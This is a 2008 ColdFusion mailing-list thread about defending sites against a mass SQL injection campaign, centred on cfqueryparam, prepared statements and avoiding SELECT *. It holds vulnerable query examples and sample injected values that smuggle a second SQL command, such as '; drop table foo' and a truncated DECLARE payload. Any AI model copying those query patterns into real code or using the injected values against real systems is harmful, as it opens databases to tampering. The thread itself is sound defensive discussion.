Home of the ColdFusion Community
|
Mailing Lists
|
Home /
Groups /
ColdFusion Talk (CF-Talk)
(ot) URL Hack Attempt Leaves Me Scractching My Head
Author: Dave Watts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309751
----- Excess quoted text cut - see Original Post for more -----
Code that is disabled by CFML comments isn't executed, and is therefore
perfectly safe.
Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more information!
Author: Pete Ruckelshaus
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309746
I just got hit by this on one of my older sites (inconsistent use of
cfqueryparam) yesterday. I found an immensely helpful and very timely
posting here
http://russ.michaels.me.uk/index.cfm/2008/7/24/SQL-Injection-Attacks--How-to-protect_yourself
(I
believe "Snake" is a list participant). I spent 7 hours editing all of my
queries to make sure I was using cfqueryparam consistently throughout, then
ran Snake's AMAZINGLY EFFECTIVE sql solution to clean up the
database...otherwise it would have been down to editing thousands of
database records. Additionally, I switched all form transactions over to
POSTS and made sure everything was properly scoped.
In addition, I added a couple of scripts to my application.onRequestStart();
one of them ensures that the refering page on a POST transaction is from my
site:
<cfif CGI.http_referer DOES NOT CONTAIN CGI.server_name>
<cfsavecontent variable="msg"><p>You have attempted to perform an
illegal
operation.</p></cfsavecontent>
<cfabort showerror="#msg#">
</cfif>
The other script checks the URL and FORM scopes to ensure that it doesn't
contain anything nasty...basically the last code example from Snake's blog
posting, with some stuff added.
Pete
Author: Radek Valachovic
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309743
Interesting question:
<!--- <cfif isdefined('url.dimension')>
<cfquery name="test" datasource="#DB#" username="#USER#" password="#PASS#">
select age,size
from accessories
where age='#url.age#' and visible=1
</cfquery></cfif> --->
This is commented query in the code: Do any of you think if can process
commented? I dont think so. But I am curious these hackers can do crazy
stuff. Probably I will get an answer put in the commented query cfqueryparam
or delete it :)
Radek
On Thu, Jul 24, 2008 at 2:33 PM, Dave Watts <dwatts@figleaf.com> wrote:
----- Excess quoted text cut - see Original Post for more -----
Author: Al Musella, DPM
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309742
I set up a scheduled task to check my database every 15 minutes. It
looks for my entry in the users table, and compares my email address
and website address with what is in the database. IF it differs, I
get an email. I did the same thing for 10 different tables.
----- Excess quoted text cut - see Original Post for more -----
Author: Al Musella, DPM
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309740
I won't mention names but a few popular websites I use have been
hit.. one was down for 3 days now.
Recently I set up an annonymous ftp server.. I needed a few people to
send me files and I thought that would be the easiest way. the url
was private - not published anywhere.. 2 days later my hard drive
filled up. But i didn't see any files in the ftp directory. They
created a directory whose name was a blank space so a quick look
wouldn't see any extra files there, but there were gigabytes of porn,
movies and music in there. The funny thing is you can't delete a
blank directory name from windows explorer, or even a command prompt.
the trick is to go into a command prompt and do a directory that
shows the dos version of the filename and delete that!
these people are slick.. we have to start fighting back somehow.
----- Excess quoted text cut - see Original Post for more -----
Author: Radek Valachovic
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309672
Yes Exactly, Run the current attack, I am doing it to see how am I securing
the site and it works!
HAppy Attacking :)
On Thu, Jul 24, 2008 at 3:39 PM, Dave Watts <dwatts@figleaf.com> wrote:
----- Excess quoted text cut - see Original Post for more -----
Author: Dave Watts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309671
> If I do find any vunerabilities, is there something I can run
> against the database to see if it has been infected?
Well, for the current attack, you would look at your
varchar/nvarchar/text/ntext columns to see if anything's been appended to
them. This should be fairly easy to identify.
Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more information!
Author: Jochem van Dieten
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309670
Al Musella, DPM wrote:
> I can't believe this isn't a big news story.. it has been the focus
> of my life for the last 48 hours:)
To be a big news story, it would have to be big and new. It is neither.
The impact it has had on the net is negligible. Who can mention 3 sites
that have been hit that you would have known about if you weren't a
ColdFusion developer?
The scale and coordination of the attacks are nothing new either. Mail
servers have been under this sort of attack permanently for as long as I
can remember. Just bring a blackhole mailserver online that appears to
be an open relay and see what happens.
The techniques used for (and against) this attack are nothing new. This
attack has been running against pages with an .asp extension since May.
It is just that only recently they switched from just attacking ASP to
other extensions as well.
And on top of that there is a story since Monday about DNS that is much
scarier and much closer to home to most readers.
Jochem
Author: Radek Valachovic
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309669
I noticed since I started securing the site also with tha cfif EXEC, I have
lower hits with the code, 3 days ago and more I got hit like an every hour,
these past 2 days I got 2 hits a day to the exact same page with exact same
variables in url....
On Thu, Jul 24, 2008 at 3:05 PM, Radek Valachovic <rentgeeen@gmail.com>
wrote:
----- Excess quoted text cut - see Original Post for more -----
Author: Cutter (CFRelated)
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309667
Radek,
The point is, without the cfqueryparam it doesn't really get there. The
passed user_id isn't bound in the query, so the ;{everything else} get's
processed as additional SQL statements. When the value is bound, then
the ;{and everything else} would actually be passed into the field
(since it isn't being processed by your SQL server as a statement, just
a value), failing the field definition and throwing an error.
Steve "Cutter" Blades
Adobe Certified Professional
Advanced Macromedia ColdFusion MX 7 Developer
_____________________________
http://blog.cutterscrossing.com
Radek Valachovic wrote:
----- Excess quoted text cut - see Original Post for more -----
Author: Radek Valachovic
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309668
Great, yes understand, basically it runs another script against database so
it assumes that it is not part of the user_id. good thanks.
On Thu, Jul 24, 2008 at 3:05 PM, Dave Watts <dwatts@figleaf.com> wrote:
----- Excess quoted text cut - see Original Post for more -----
Author: Matthew Smith
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309666
>I was just looking into that myself.
>
>http://qpscanner.riaforge.org/
>
>
>
I plan on running this against the code of my sites just to be sure.
If I do find any vunerabilities, is there something I can run against the
database to see if it has been infected?
Thanks.
Author: Radek Valachovic
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309664
Correction sql should be in the text:
SELECT location FROM item WHERE user_id = #url.user_id#
not SELECT location FROM item WHERE url.user_id = #url.user_id#
sorry
On Thu, Jul 24, 2008 at 2:55 PM, Radek Valachovic <rentgeeen@gmail.com>
wrote:
----- Excess quoted text cut - see Original Post for more -----
Author: Dave Watts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309665
> How can it be processed when USER_ID in database is
> specified for LENGHT 15 and USER_ID with Hacker code has
> lenght like 100?
For the purpose of preventing SQL injection, the length of the field in your
prepared statement doesn't matter. It is enough for it to be a prepared
statement, which you build in CF using CFQUERYPARAM. Without it, the
database has no idea which parts of the query are supposed to be executable
SQL, and which parts are supposed to be data.
In a successful SQL injection attack, the value that's injected would be
more than just your USER_ID value; it would also contain executable SQL
code, and your database would simply execute the code; it would not assume
that this code is supposed to be part of your USER_ID value.
Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more information!
Author: Ian Skinner
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309663
Dave Phillips wrote:
----- Excess quoted text cut - see Original Post for more -----
To clarify the clarification, an execution plan is *always* built,
whether the SQL uses the best practice of <cfqueryparam...> or not.
Without the <cfqueryparam...> many more execution plans may be generated
depending on the nature of the queries and the application the live in
and its usage. Thus these non-queryparam plans can easily be pushed out
the cache faster and thus the problem described will live for a shorter
time. But it can happen either way.
Author: Radek Valachovic
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309661
Okay what about this, for example column name ITEMOID has in DB maxlenght 15
and it is numeric.
Integer is -2,147,483,648 and 2,147,483,647 = 10 the point is 10 or 15
doesnt matter.
I will specify for ITEMOID in DB maxl = 15
Example QUERY is
SELECT location FROM item WHERE url.user_id = #url.user_id#
URL gonna look like this example:
http://mydomain.com/index.cfm?user_id=125456
Now imagine the Hacker Code (Declare etc etc) will add to the end:
http://mydomain.com/index.cfm?user_id=125456;DECLARE........
How can it be processed when USER_ID in database is specified for LENGHT 15
and USER_ID with Hacker code has lenght like 100?
I guess u gonna gonna say that's why u have to use :
SELECT location FROM item WHERE url.user_id = <cfqueryparam
value="#url.user_id#" cfsqltype="CF_SQL_INTEGER">
to validate it.
I undestand that, but why it is not validated already when in DB it is
specified lenght 15 and using this query:
SELECT location FROM item WHERE url.user_id = #url.user_id# it should work
and I have to use another validation in code using
cfqueryparam?:
SELECT location FROM item WHERE url.user_id = <cfqueryparam
value="#url.user_id#" cfsqltype="CF_SQL_INTEGER">
Thanks RAdek
On Thu, Jul 24, 2008 at 2:21 PM, Adrian Lynch <contact@adrianlynch.co.uk>
wrote:
----- Excess quoted text cut - see Original Post for more -----
Author: Brad Wood
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309660
What Charlie says is correct. To elaborate on the performance part..
If you use proper indexes in your database it is possible to have statements
that are called "covered selects". This means that every column in the
select clause and where clause are all part of an index, and the records can
be retrieved without every hitting the table. Example:
SELECT order_id
FROM orders
WHERE cust_last_name = 'Wood'
Let's supposed I had an index called IX_cust_name on my cust_last_name
column (because I searched it often) and I added order_id in as an included
column in that index.
The execution plan would MOST LIKELY perform an index seek on IX_cust_name
(very, very fast) and return the order_id found in stored along side it--
probably on the same page of memory. Your database never had to even hit the
table. If you database is stored on a SAN with a large cache, your oft used
index might even be cached in the controller memory.
Now, supposed you had taken a shortcut and done the following:
SELECT *
FROM orders
WHERE cust_last_name = 'Wood'
Even though you are only using the order_id column (which no one would be
able to tell easily) you execution plan now performs an index seek AND
performs a bookmark lookup back to the table with the key stored in the
index to fetch all the other columns in that row whether they are needed at
all. Bookmark lookups can KILL you in large result sets.
A lot of this stuff is so negligible you won't notice it with small
database, but databases have a way of growing until performance is
unbearable. Also, additional tables added to the select later will cause
the amount of data being returned to blossom. Anyway, I hope that helps put
some reasoning to it.
~Brad
----- Excess quoted text cut - see Original Post for more -----
Author: Dave Phillips
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309655
(Brad) >>This is starting to sound like a bad multiple choice question from
a college
final... :)
Escpecially our college, Brad. ;-)
(Claude) >> It may be a silly question, but why a SELECT * will brake
because an unused column was dropped?
To clarify, it is a SELECT * query with a CFQUERYPARAM in it. Because the
first time the query is executed, an execution plan is built and cached.
That execution plan extrapolates all the columns from the table since the *
was used. Now, once the query is executed once, drop a column from the
table and run the query again. It will fail because the column it is trying
to reference (through the cached execution plan) is no longer there.
Example table:
Table name: user
Columns: user_id, firstname, lastname, address1, address2, address3, city,
state, zip
CF code:
<cfquery datasource="whatever" name="qGetUser">
SELECT *
FROM user
WHERE user_id = <cfqueryparam value="#url.user_id#"
cfsqltype="cf_sql_integer">
</cfquery>
Execute the CF Code - now the execution plan that is cached has a SELECT
statement that looks something like this:
SELECT user_id, firstname, lastname, address1, address2, address3, city,
state, zip
FROM user
WHERE user_id = (param)
Now, every time the query is run, it will use that execution plan until the
query changes (not the parameter, the query).
Okay, so now some db guy decides that address3 isn't in use and decides to
drop it on a whim (we'll fire him later).
Guess what, now every execution of your query will fail because 'address3'
does not exist in the user table.
It is true what someone said yesterday, that you could go into your code,
change a space or new line, and rerun your code and now it will work
(because the execution plan has been rebuilt). However, how many failed
requests between the time the column was dropped and you change your code
will occur? Who knows. One is too many, that's for sure.
So, as I stated before, and to take a spin off of Ben's recent comment:
It is always a good idea to never use SELECT * when using CFQUERYPARAM and
since it is always a good idea to use CFQUERYPARAM then it is always a good
idea to never use SELECT *. :)
You can quote me on that. ;-)
Dave Phillips
Author: Bryan Hogan
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309656
It will be secured, but it is better IMO to use the maxlength attribute.
It should match your schema. If I were doing this the maxlength on both
my cfqueryparam and column would be the maximum length of allowed email
addresses. My standard length for passwords can be no longer than 8
characters. So my column would have a max length of 8 and my
cfqueryparam would have the same value.
Remember to not allocate room for more than you are going to use.
MAXLENGTH would typically be the maximum the underlying table allows or
the
maximum you want to accept. And MAXLENGTH is optional.
--- Ben
What would you suggest for this kind of thing:
Select USERID
from users
where email = '#trim(arguments.email)#' and password =
'#trim(arguments.password)#'
Something like this?
Select USERID
from users
where email = <cfqueryparam value="#trim(arguments.email)#"
cfsqltype="CF_SQL_VARCHAR" maxlength="?"> and password = <cfqueryparam
value="#trim(arguments.password)#" cfsqltype="CF_SQL_VARCHAR"
maxlength="?">
I put Question marks to MAXLENGHT still thinking if I should specify it
for
more security (but guessing lenght of emails someone can be rejected) or
can
it be without MAXLENGHT?
Radek
>
> Not using SELECT * is more of a "best practices" kind of thing.
>
> When you use it, you're potentially pulling more information than you
need,
> which is inefficient. Additionally, specifying all of the columns
you're
----- Excess quoted text cut - see Original Post for more -----
(without
the
> need to <cfdump> the query and see it).
>
>
> --
> A byte walks into a bar and orders a pint. Bartender asks him "What's
> wrong?" Byte says "Parity error." Bartender nods and says "Yeah, I
thought
> you looked a bit off."
>
>
>
Author: Dave Watts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309657
> > If you don't really care
>
> I don't really care measuring the difference it makes,
> because it must certainly be marginal, and it is not because
> I don't care the difference it can made that I cannot make a
> comment about it.
If you want to be a contrarian for the sake of being a contrarian, go right
ahead. However, you speculated that there might be overhead in creating an
execution plan, when one is created whether you use CFQUERYPARAM or not!
Then, immediately after that, you wrote that you don't care one way or the
other.
If you don't care one way or the other, why would that speculation be a
deciding factor about whether to use CFQUERYPARAM? It seems to me that your
sole justification for not using it, or using it selectively, or whatever,
is that it's too much trouble to type it out. And if that's true, that's
fine with me, because I don't really care about your applications
specifically.
It may well be the case that under specific conditions, there is a cost to
using CFQUERYPARAM. For example, there may be some queries that benefit from
having new execution plans generated each time they're run, instead of using
a cached execution plan. But you have failed to identify any of those
specific edge cases. You're not recommending that people attempt to identify
these edge cases, either. And, in the absence of evidence about a specific
case, the safe assumption is that building a prepared statement will not
only provide complete protection against SQL injection, but will also
improve performance. In ANY case, building a prepared statement that uses
CFQUERYPARAM to wrap every piece of user-supplied data will provide complete
protection against SQL injection, by its very nature - it tells the database
the difference between executable code and data.
Instead, you're throwing up a smokescreen of crap about why people shouldn't
use it, or why they should be more selective in using it. You're willing to
rely on all sorts of other things to provide what you see as equivalent to
the protection you get from prepared statements - making sure your MySQL
database is configured a certain non-default way, filtering out "bad words"
from incoming HTTP requests, etc - but it would be easier and more reliable
to just build the prepared statements in the first place!
Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more information!
Author: Brad Wood
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309654
Absolutely. Minimally, just using a cfqueryparam tag with the value
attributes is enough to let the SQL server know the difference between the
SQL statement itself and the parameters being passed into it. With that
distinction, you may get crap data in your database if it is an insert or an
update, but arbitrary and malicious code will NEVER get into the cfquery and
be executed as SQL.
The maxlengh and type are just additional checks which will cause an error
to be thrown from ColdFusion when bad data is passed in. They are a very
good idea, but they aren't required.
~Brad
> So if I wont use maxlenght still it is gonna be secured? thanks
Author: Dave Watts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309652
> So if I wont use maxlenght still it is gonna be secured?
Yes.
Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more information!
Author: Ian Skinner
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309653
Charlie Griefer wrote:
> Not using SELECT * is more of a "best practices" kind of thing.
>
> When you use it, you're potentially pulling more information than you need,
> which is inefficient.
It can also lead to very hard to debug errors. When "*" is used, the
list of columns can become cached. If the database changes, this cache
does not necessarily get updated. The code will then break because the
list of columns it is trying to get does not match the database any
more. Even if the CFML was not actually using the columns that where
added or removed.
Author: Radek Valachovic
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309651
So if I wont use maxlenght still it is gonna be secured? thanks
On Thu, Jul 24, 2008 at 2:23 PM, Ben Forta <ben@forta.com> wrote:
----- Excess quoted text cut - see Original Post for more -----
Author: Brad Wood
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309649
Your max length in this scenario should most likely be the size of the
database column in question. If you use a varchar(50) to store your E-mail
address, then you know that the only valid strings coming into this query
are going to be 50 characters or less.
> What would you suggest for this kind of thing:
>
> Select USERID
> from users
> where email = '#trim(arguments.email)#' and password =
> '#trim(arguments.password)#'
Author: Ben Forta
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309650
MAXLENGTH would typically be the maximum the underlying table allows or the
maximum you want to accept. And MAXLENGTH is optional.
--- Ben
What would you suggest for this kind of thing:
Select USERID
from users
where email = '#trim(arguments.email)#' and password =
'#trim(arguments.password)#'
Something like this?
Select USERID
from users
where email = <cfqueryparam value="#trim(arguments.email)#"
cfsqltype="CF_SQL_VARCHAR" maxlength="?"> and password = <cfqueryparam
value="#trim(arguments.password)#" cfsqltype="CF_SQL_VARCHAR" maxlength="?">
I put Question marks to MAXLENGHT still thinking if I should specify it for
more security (but guessing lenght of emails someone can be rejected) or can
it be without MAXLENGHT?
Radek
>
> Not using SELECT * is more of a "best practices" kind of thing.
>
> When you use it, you're potentially pulling more information than you
need,
----- Excess quoted text cut - see Original Post for more -----
the
----- Excess quoted text cut - see Original Post for more -----
Author: Adrian Lynch
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309648
Whatever the length of the column in your DB.
Adrian
What would you suggest for this kind of thing:
Select USERID
from users
where email = '#trim(arguments.email)#' and password =
'#trim(arguments.password)#'
Something like this?
Select USERID
from users
where email = <cfqueryparam value="#trim(arguments.email)#"
cfsqltype="CF_SQL_VARCHAR" maxlength="?"> and password = <cfqueryparam
value="#trim(arguments.password)#" cfsqltype="CF_SQL_VARCHAR" maxlength="?">
I put Question marks to MAXLENGHT still thinking if I should specify it for
more security (but guessing lenght of emails someone can be rejected) or can
it be without MAXLENGHT?
Radek
Author: Brad Wood
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309647
This is starting to sound like a bad multiple choice question from a college
final... :)
~Brad
> Fine, it's always a good idea to never use *
>
> ;-)
>
> --- Ben
Author: Jim Wright
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309645
On Thu, Jul 24, 2008 at 11:20 AM, Claude Schneegans <
schneegans@internetique.com> wrote:
> A very particular situation though.
Perhaps, but the following demonstrates how this kind of issue can be even
more problematic when the table is changed in such a way that no error is
thrown by the view...
CREATE TABLE tmpTest(foo1 int,bar2 int)
GO
INSERT INTO tmpTest VALUES(1,2)
GO
CREATE VIEW tmpView AS SELECT * FROM tmpTest
GO
SELECT * FROM tmpView --Note the column names and the associated values
GO
ALTER TABLE tmpTest DROP COLUMN foo1
GO
ALTER TABLE tmpTest ADD foo1 int
GO
UPDATE tmpTest SET foo1 = 1
SELECT * FROM tmpView --Note the column names and the associated values (and
no error being thrown)
Author: Radek Valachovic
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309646
What would you suggest for this kind of thing:
Select USERID
from users
where email = '#trim(arguments.email)#' and password =
'#trim(arguments.password)#'
Something like this?
Select USERID
from users
where email = <cfqueryparam value="#trim(arguments.email)#"
cfsqltype="CF_SQL_VARCHAR" maxlength="?"> and password = <cfqueryparam
value="#trim(arguments.password)#" cfsqltype="CF_SQL_VARCHAR" maxlength="?">
I put Question marks to MAXLENGHT still thinking if I should specify it for
more security (but guessing lenght of emails someone can be rejected) or can
it be without MAXLENGHT?
Radek
----- Excess quoted text cut - see Original Post for more -----
Author: Ben Forta
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309644
Fine, it's always a good idea to never use *
;-)
--- Ben
>>it's safe to say that avoiding "*" is a good idea,
Now that's the kind of statement I prefer: "a good idea",
better than *always* or *never* :-)
--
_______________________________________
REUSE CODE! Use custom tags;
See http://www.contentbox.com/claude/customtags/tagstore.cfm
(Please send any spam to this address: piegeacon@internetique.com)
Thanks.
Author: Claude Schneegans
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309643
>>it's safe to say that avoiding "*" is a good idea,
Now that's the kind of statement I prefer: "a good idea",
better than *always* or *never* :-)
--
_______________________________________
REUSE CODE! Use custom tags;
See http://www.contentbox.com/claude/customtags/tagstore.cfm
(Please send any spam to this address: piegeacon@internetique.com)
Thanks.
Author: Dave Watts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309640
> It may be a silly question, but why a SELECT * will brake
> because an unused column was dropped?
For the same reason that SELECT * will break if you use it in a view, run
the view, then change the underlying schema. The "*" gets dereferenced to
actual columns in the execution plan, which gets cached. If the columns
change, the execution plan may no longer be valid.
Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more information!
Author: Claude Schneegans
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309639
>>If you don't really care
I don't really care measuring the difference it makes, because it must
certainly be marginal,
and it is not because I don't care the difference it can made that I cannot
make a comment about it.
--
_______________________________________
REUSE CODE! Use custom tags;
See http://www.contentbox.com/claude/customtags/tagstore.cfm
(Please send any spam to this address: piegeacon@internetique.com)
Thanks.
Author: Dave Watts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309638
> A very particular situation though. It will not prevent me
> from using SELECT * when I need all fields. This is more
> efficient than list all of them.
It may be more efficient for you as you type them out, but it will be less
efficient for your database, which has to figure out what "*" represents by
querying its own information schema. It also won't be more efficient for
someone following along behind you, because they won't be able to infer the
schema from the query.
In the first case, the performance difference will admittedly be minor. In
the second case, perhaps no one but you will ever edit the code that you
write. Nevertheless, it's safe to say that avoiding "*" is a good idea, and
for most people it's easier to adhere to a set of best practices rather than
evaluating everything they do, every time they do it, to determine what to
do right now.
Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more information!
Author: Charlie Griefer
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309637
On Thu, Jul 24, 2008 at 10:48 AM, Radek Valachovic <rentgeeen@gmail.com>
wrote:
> Yeah I was reading in the forum this one, that using SELECT * is not good,
> can u explain why on short example? What is Pro and Cons what other type of
> security it gonna give me? Thanks
>
Not using SELECT * is more of a "best practices" kind of thing.
When you use it, you're potentially pulling more information than you need,
which is inefficient. Additionally, specifying all of the columns you're
pulling is more self-documenting.
I'd much rather see:
SELECT
u.userName
, u.userPhone
, u.userEmail
, u.userAddress
FROM
Users u
WHERE
...
than
SELECT * FROM Users
with the former, I have a better idea of what i'm dealing with (without the
need to <cfdump> the query and see it).
--
A byte walks into a bar and orders a pint. Bartender asks him "What's
wrong?" Byte says "Parity error." Bartender nods and says "Yeah, I thought
you looked a bit off."
Author: Dave Watts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309636
> Ok, this is another example where CFQP is useful, as the doc says.
> But if the query is not likely to be executed often, which is
> the case with small sites, generating the execution plan
> might represent an overhead on the contrary.
> (just assuming, I have not run tests, and I don't really care ;-)
If you don't really care, why make the assertion?
The database ALWAYS generates an execution plan, whether you use
CFQUERYPARAM or not. CFQUERYPARAM simply makes it more likely that the
database will be able to reuse an execution plan, as it makes that plan more
general that it would otherwise be.
> Understand me correctly, I never said that CFQP is NEVER
> useful, I just don't like ayatollah statements like SHOULD *always*!
Sometimes "always" is the right answer.
Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more information!
Author: Claude Schneegans
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309635
>>When your database executes a SQL statement, it generates an
execution plan
that best fits that statement and it caches that plan in memory for later
use.
Ok, this is another example where CFQP is useful, as the doc says.
But if the query is not likely to be executed often, which is the case
with small sites,
generating the execution plan might represent an overhead on the contrary.
(just assuming, I have not run tests, and I don't really care ;-)
Understand me correctly, I never said that CFQP is NEVER useful, I just
don't
like ayatollah statements like SHOULD *always*!
--
_______________________________________
REUSE CODE! Use custom tags;
See http://www.contentbox.com/claude/customtags/tagstore.cfm
(Please send any spam to this address: piegeacon@internetique.com)
Thanks.
Author: Mark Kruger
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309634
Second to last sentence should ready .... "you are safe from damage to the
db"
Mark A. Kruger, CFG, MCSE
(402) 408-3733 ext 105
www.cfwebtools.com
www.coldfusionmuse.com
www.necfug.com
Using CFQUERYPARAM will secure your DB calls. That doesn't mean you don't
have other problems. But it does mean that executing arbitrary code against
the DB using user inputs (form, url, cookie) is no longer possible. When the
system sees something like "<cfqueryparam type="CF_SQL_CHAR" value="blah;
drop table foo"/> it will bind those characters to a variable of the type
"char". Unless you are subsequently executing that char string as dynamic
SQL somewhere (like in an SP) you are from damage to the DB. Of course there
are plenty of other things to worry about :)
-Mark
Author: Radek Valachovic
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309633
Yeah I was reading in the forum this one, that using SELECT * is not good,
can u explain why on short example? What is Pro and Cons what other type of
security it gonna give me? Thanks
Radek
On Thu, Jul 24, 2008 at 1:39 PM, Brad Wood <brad@bradwood.com> wrote:
----- Excess quoted text cut - see Original Post for more -----
Author: Brad Wood
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309632
That's fair enough from a security stand point, but I still use cfqueryparam
with MS SQL for performance reason.
When your database executes a SQL statement, it generates an execution plan
that best fits that statement and it caches that plan in memory for later
use (so it doesn't have to be generated again which is costly). The cached
execution plan will ONLY be used for other queries that are the EXACT same.
Keep in mind also that your database server has a limit to how many plans it
will cache.
If you output an order number directly into the query and then view
different 100,000 orders, your SQL server will try and cache 100,000
different plans.
Select order_id From orders Where order_id = 1
Select order_id From orders Where order_id = 2
Select order_id From orders Where order_id = 3
Select order_id From orders Where order_id = 4
etc...
Needless to say, that is a waste of resources, and it won't keep that many
plans anyway. Chances are, other useful plans will get pushed out of memory
to make room. However, if all your inputs are parameterized, then all those
SQL statements are now IDENTICAL and share the same plan:
Select order_id From orders Where order_id = (param)
This single plan can be reused for all 100,000 orders which means other
queries won't have their plans purged out of memory.
There is a valid discussion about the use of non-optimal plan, but as a
general rule, I wouldn't let that stop you from the best practice.
~Brad
> Ok, then lets say that CFQP should alway be used with MySQl...
Author: Mark Kruger
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309631
Using CFQUERYPARAM will secure your DB calls. That doesn't mean you don't
have other problems. But it does mean that executing arbitrary code against
the DB using user inputs (form, url, cookie) is no longer possible. When the
system sees something like "<cfqueryparam type="CF_SQL_CHAR" value="blah;
drop table foo"/> it will bind those characters to a variable of the type
"char". Unless you are subsequently executing that char string as dynamic
SQL somewhere (like in an SP) you are from damage to the DB. Of course there
are plenty of other things to worry about :)
-Mark
Mark A. Kruger, CFG, MCSE
(402) 408-3733 ext 105
www.cfwebtools.com
www.coldfusionmuse.com
www.necfug.com
Do you think when I am using cfqueryparams for example with numbers like
this is secured?:
SELECT * FROM product WHERE productoid=<cfqueryparam
value="#url.productoid#" cfsqltype="CF_SQL_INTEGER" maxlength="6">
Another example I am thinking worse is with text, I made it like this:
SELECT * FROM item WHERE L3=<cfqueryparam value="#url.L3#"
cfsqltype="CF_SQL_VARCHAR" maxlength="22">
I added maxlength to as more security, with PRODUCTOID it is always 6, and
text no more then 22, do you think this should work to
secure the site?, not talking about permissions to database etc, just about
cfqueryparams.
> Excuse me... But why are you checking script_name and Path_info for
"EXEC("
> .... Both of these are generated on the web server - not sent by the
> browser... So I'd be interested to know your reasoning. Also, form
> elements are not part of the "query_string" since they are passed in a
form "body"
----- Excess quoted text cut - see Original Post for more -----
Author: Brad Wood
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309629
Radek, what you did is exactly correct. (Well, some people might bust your
balls for the select *, but that's another performance/bug related
discussion)
Just make sure you get EVERY vulnerable query in your site. It only takes
